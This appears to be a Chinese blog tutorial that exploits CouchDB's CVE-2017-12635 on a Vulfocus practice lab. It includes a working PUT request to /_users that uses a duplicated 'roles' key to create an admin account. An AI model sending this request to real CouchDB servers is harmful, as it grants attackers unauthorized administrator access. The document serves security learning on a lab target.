当前位置: 首页 > article >正文

中间件安全(二)

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

前文链接:中间件安全(一)

本文主要讲解Couchdb数据库未授权越权漏洞(CVE-2017-12635)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,靶场界面简介。

可以看到开放了三个端口,尝试后发现,仅http://123.58.224.8:35469 可以打开,打开后界面如下:

并无什么有价值的信息。

点击原始数据后,可以发现确实为Couchdb数据库,并且版本为:2.1.0(注意CVE-2017-12635影响版本:小于 1.7.0 以及 小于 2.1.1)。

访问/_utils目录。

couchdb/_utils目录简介:

可以看到,网页自动跳转到登录界面。

二,进行攻击。

随机输入账号密码并使用bp进行抓包。

可以看到,登录失败。

右键,将其发送到重发器。

本漏洞可以绕过创建权限而去实现任意创建admin权限的账号 实现登录。

使用从数据包,正常新建用户:

POST /_session HTTP/1.1
Host: 123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 94

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

失败。

使用绕过权限数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: http://123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 112

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

成功。

使用账号密码(vulhub,vulhub)进行测试。

成功。


http://www.kler.cn/a/312015.html

相关文章:

  • 自动化工具 Gulp
  • 深入解析贪心算法及其应用实例
  • 【excel】easy excel如何导出动态列
  • 三、损失函数
  • 量化交易系统开发-实时行情自动化交易-3.4.2.2.Okex交易数据
  • 速盾:高防 CDN 和 CDN 的缓存机制都一样吗?
  • 作品集生成链接或二维码:设计师求职
  • 数据结构和算法之线性结构
  • Java中Integer的缓存池是怎么实现的?
  • 旧系统迁移新框架:FastAPI 的 WSGIMiddleware 让过程变得简单
  • 松材线虫无人机数据集——20731个,已人工标注出来的样本【深度学习样本】
  • 【Leetcode:2848. 与车相交的点 + 模拟计数】
  • Java | Leetcode Java题解之第413题等差数列划分
  • 最新!综合性SCI期刊汇总!《NATURE》位居榜首~
  • 大数据基础架构技术栈一览
  • Redis 的三个并发问题及解决方案(面试题)
  • 【AI大模型】ChatGPT模型原理介绍(下)
  • Redis 执行 Lua,能保证原子性吗?
  • 深入解析 JVM 中静态块、静态属性、构造块与构造方法的执行顺序
  • Vue2项目升级攻略:如何更新package.json中的依赖
  • WPF 中的线程池
  • 阿里云盘照片事件!网络安全警钟长鸣
  • 网站采用H5+CSS3开发的优势和劣势
  • postgresql-patroni高可用安装部署
  • 中国电子学会202306青少年软件编程(Python)等级考试试卷(二级)真题
  • Kubernetes调度基础